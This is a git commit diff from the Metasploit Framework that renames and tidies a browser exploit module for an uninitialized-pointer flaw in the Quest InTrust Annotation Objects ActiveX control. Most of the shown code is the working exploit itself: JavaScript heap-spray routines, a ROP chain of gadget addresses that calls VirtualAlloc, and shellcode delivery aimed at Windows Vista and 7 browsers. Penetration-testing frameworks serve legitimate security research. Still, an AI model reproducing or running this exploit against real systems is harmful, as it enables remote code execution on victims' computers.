Module rename. Cleanup whitespace. Fix typos.
parent
14f85e406f
commit
0d739a1a51
|
@ -1,12 +1,8 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
###
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super( update_info(info,
|
||||
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
|
||||
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
|
||||
'Description' => %q{
|
||||
This module exploits a uninitialized variable vulnerability in the
|
||||
This module exploits an uninitialized variable vulnerability in the
|
||||
Annotation Objects ActiveX component. The activeX component loads into memory without
|
||||
opting into ALSR so this module exploits the vulnerability against windows Vista and
|
||||
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
|
||||
points to part of the rop chain in a heap chunk and the calculated call will hit the
|
||||
pivot in a seperate heap chunk. This will take some time in the users browser.
|
||||
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
|
||||
points to part of the ROP chain in a heap chunk and the calculated call will hit the
|
||||
pivot in a separate heap chunk. This will take some time in the users browser.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
|
||||
'rgod <rgod[at]autistici.org>', # initial discovery & poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '80662'],
|
||||
[ 'BID', '52765'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'migrate -f',
|
||||
'InitialAutoRunScript' => 'migrate -f'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
|
||||
|
||||
# Re-generate the payload.
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
|
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
memory = new Array();
|
||||
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
|
||||
}
|
||||
|
||||
function main(){
|
||||
heapspray();
|
||||
#{obj_name}.Add(#{my_target.ret},1);
|
||||
|
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
junk,
|
||||
junk,
|
||||
junk,
|
||||
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
||||
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
|
||||
].pack('V*')
|
||||
|
||||
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
|
||||
|
||||
rop_gadgets << [
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015cee, # pop edx ; retn
|
||||
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
||||
0x44015ca4, # mov eax,[edx+4] ; retn
|
||||
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
||||
junk, # filler (compensate)
|
||||
0x440159bb, # pop ebp ; retn
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
||||
0x440012c1, # push esp ; ret 08
|
||||
0x44016264, # pop ebx ; retn
|
||||
0x00004000, # 0x00000001-> ebx
|
||||
0x44015cc9, # pop edx ; retn
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x44017664, # pop ecx ; retn
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x44017bd8, # pop edi ; retn
|
||||
0x44017ebe, # retn
|
||||
0x4400bf25, # pop eax ; retn
|
||||
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
||||
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
||||
0x90909090, # nops, do not change as it changes the offset
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015CEF, # retn
|
||||
0x44015cee, # pop edx ; retn
|
||||
0x4401a130, # ptr to &VirtualAlloc() (IAT)
|
||||
0x44015ca4, # mov eax,[edx+4] ; retn
|
||||
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
|
||||
junk, # filler (compensate)
|
||||
0x440159bb, # pop ebp ; retn
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
junk, # filler (retn offset compensation)
|
||||
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
|
||||
0x440012c1, # push esp ; ret 08
|
||||
0x44016264, # pop ebx ; retn
|
||||
0x00004000, # 0x00000001-> ebx
|
||||
0x44015cc9, # pop edx ; retn
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x44017664, # pop ecx ; retn
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x44017bd8, # pop edi ; retn
|
||||
0x44017ebe, # retn
|
||||
0x4400bf25, # pop eax ; retn
|
||||
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
|
||||
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
|
||||
0x90909090, # nops, do not change as it changes the offset
|
||||
0x90909090,
|
||||
0x90909090,
|
||||
0x90909090,
|
||||
|
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var data = payload;
|
||||
while(data.length < 100000) { data += data; }
|
||||
var onemeg = data.substr(0, 64*1024/2);
|
||||
for (i=0; i<14; i++) {
|
||||
onemeg += data.substr(0, 64*1024/2);
|
||||
}
|
||||
|
||||
for (i=0; i<14; i++) {
|
||||
onemeg += data.substr(0, 64*1024/2);
|
||||
}
|
||||
|
||||
onemeg += data.substr(0, (64*1024/2)-(38/2));
|
||||
var block = new Array();
|
||||
for (i=0; i<700; i++) {
|
||||
block[i] = onemeg.substr(0, onemeg.length);
|
||||
}
|
||||
|
||||
for (i=0; i<700; i++) {
|
||||
block[i] = onemeg.substr(0, onemeg.length);
|
||||
}
|
||||
}
|
||||
|
||||
function main(){
|
||||
heapspray();
|
||||
#{obj_name}.Add(#{my_target.ret},1);
|
||||
|
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</html>
|
||||
EOF
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
print_status("#{peer} Sending HTML...")
|
||||
|
||||
#Remove the extra tabs from content
|
||||
content = content.gsub(/^\t\t/, '')
|
Loading…
Reference in New Issue